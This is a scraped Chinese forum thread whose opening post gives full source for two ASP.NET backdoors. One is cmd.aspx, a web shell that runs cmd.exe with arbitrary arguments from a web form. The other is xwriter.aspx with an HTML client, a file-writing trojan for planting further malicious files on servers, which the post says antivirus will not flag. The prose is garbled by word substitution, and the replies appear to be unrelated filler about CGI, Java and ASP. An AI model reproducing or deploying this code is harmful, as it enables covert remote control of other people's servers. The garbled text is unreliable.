仓酷云

标题: ASP.NET编程:两个有效的ASP.Net小程序 [打印本页]

作者: 分手快乐    时间: 2015-1-16 22:32
标题: ASP.NET编程:两个有效的ASP.Net小程序
就安全性而言,Java已经远远低于VB.NET,更无法与安全性著称的C#相比。asp.net|程序  1、cmd.aspx
  在罪恶八进制论坛(PS:有谁晓得为何比来几天这论坛打不开啊)有伴侣提出WebAdmin实行命令不克不及带参数的成绩,偶找了个BT主机来尝尝,公然有成绩,就把之前谁人cmd.aspx改了改,就请对付着用先。WebAdmin2.X的下个版本将修复这个成绩.
  把一下代码复制保留为一.aspx文件便可:
<%@PageLanguage="VB"Debug="true"%><%@importNamespace="system.IO"%><%@importNamespace="System.Diagnostics"%><scriptrunat="server">
SubRunCmd(SrcAsObject,EAsEventArgs)
DimmyProcessAsNewProcess()
DimmyProcessStartInfoAsNewProcessStartInfo(xpath.Text)myProcessStartInfo.UseShellExecute=FalsemyProcessStartInfo.RedirectStandardOutput=true
myProcess.StartInfo=myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
DimmyStreamReaderAsStreamReader=myProcess.StandardOutput
DimmyStringAsString=myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text=vbcrlf&"<pre>"&mystring&"</pre>"
EndSub
</script>
<html>
<head>
<title>ASP.NETShellforWebAdmin2.XFinal</title>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312"/>
</head>
<body>
<formrunat="server">
<asp:Labelid="L_p"style="COLOR:#0000ff"runat="server"width="80px">Program</asp:Label>
<asp:TextBoxid="xpath"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px">c:windowssystem32cmd.exe</asp:TextBox>
<br/>
<asp:Labelid="L_a"style="COLOR:#0000ff"runat="server"width="80px">Arguments</asp:Label>
<asp:TextBoxid="xcmd"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px"Text="/cnetuser">/cnetuser</asp:TextBox>
<br/>
<asp:Buttonid="Button"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;COLOR:#ffffff;BORDER-BOTTOM:#084b8e1pxsolid;BACKGROUND-COLOR:#719bc5"runat="server"Width="100px"Text="Run"></asp:Button>
<p>
<asp:Labelid="result"style="COLOR:#0000ff"runat="server"></asp:Label>
</p>
</form>
</body>
</html>
  2、xwriter.aspx
  记得有个ASP下的小马就是使用FSO把提交的文本信息保留为一个文件,固然体积比eval年夜些可是代码完整正当,杀毒软件也不会找茬的。呵呵,以下代码就是在ASP.NET完成这功效(本人拿往改改还能够拔出ASPX文件哦):
<%@PageLanguage="VB"%>
<%@importNamespace="System.IO"%>
<scriptrunat="server">
SubPage_load(senderAsObject,EAsEventArgs)
dimmywriteasnewstreamwriter(request.form("path"),true,encoding.default)mywrite.write(request.form("content"))
mywrite.close
response.write("Done!")EndSub
</script>
以下是客户端,复制上去保留为htm文件:

<!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
<title>XWriter.NETbylake2</title>
</head>
<body>
<formname="form1"method="post">
<divalign="center">URL:
<inputname="url"type="text"value="http://www.xxx.com/a.aspx"size="60">
<br>
Path:
<inputname="path"type="text"id="path"value="e:mywebmyowna.txt"size="60">
<br>
<textareaname=contentcols=120rows=10id="content"width=45>填进天生木马的内容,最好是全英文</textarea>
<BR>
<center>
<br>
<inputtype=submitvalue=提交>
<br>
EnjoyHacking!!!!!!</div>
</body></html>
<scriptlanguage="javascript">
functionTwoSubmit(form1){
varurl=document.form1.url.value;
form1.action=url;
form1.submit();
}
</script>
我以前很喜欢Serv-U,自从它用Java重写之后我就再也没用过,实在是太慢了,我宁可用IIS搭建FTP,虽然IIS搭建FTP在权限管理上很不灵活。
作者: 小妖女    时间: 2015-1-18 18:09
市场决定一切,我个人从经历上觉得两者至少在很长时间内还是要共存下去,包括C和C++,至少从找工作就看得出来,总不可能大家都像所谓的时尚一样,追捧一门语言并应用它。
作者: 小魔女    时间: 2015-1-22 20:05
比如封装性、继承性、多态性等等,这就解决了刚才谈到的ASP的那些弱点。封装性使得代码逻辑清晰,易于管理,并且应用到ASP.Net上就可以使业务逻辑和Html页面分离,这样无论页面原型如何改变。
作者: 飘灵儿    时间: 2015-1-31 10:54
目前在微软的.net战略中新推出的ASP.net借鉴了Java技术的优点,使用CSharp(C#)语言作为ASP.net的推荐语言,同时改进了以前ASP的安全性差等缺点。但是,使用ASP/ASP.net仍有一定的局限性,因为从某种角度来说它们只能在微软的WindowsNT/2000/XP+IIS的服务器平台上良好运行(虽然像ChilliSoft提供了在UNIX/Linux上运行ASP的解决方案.
作者: 谁可相欹    时间: 2015-2-6 19:01
但是目前在CGI中使用的最为广泛的是Perl语言。所以,狭义上所指的CGI程序一般都是指Perl程序,一般CGI程序的后缀都是.pl或者.cgi。
作者: 蒙在股里    时间: 2015-2-18 08:44
使用普通的文本编辑器编写,如记事本就可以完成。由脚本在服务器上而不是客户端运行,ASP所使用的脚本语言都在服务端上运行,用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。
作者: 深爱那片海    时间: 2015-3-6 01:51
是指转换后的Servlet程序代码的行数。这给调试代码带来一定困难。所以,在排除错误时,可以采取分段排除的方法(在可能出错的代码前后输出一些字符串,用字符串是否被输出来确定代码段从哪里开始出错)。
作者: 老尸    时间: 2015-3-12 18:36
主流网站开发语言之CGI:CGI就是公共网关接口(CommonGatewayInterface)的缩写。它是最早被用来建立动态网站的后台技术。这种技术可以使用各种语言来编写后台程序,例如C,C++,Java,Pascal等。
作者: 若天明    时间: 2015-3-20 01:46
在一个项目中谁敢保证每天几千万甚至几亿条的数据不丢失?谁敢保证应用的高可靠性?有可以借签的项目吗?




欢迎光临 仓酷云 (http://ckuyun.com/) Powered by Discuz! X3.2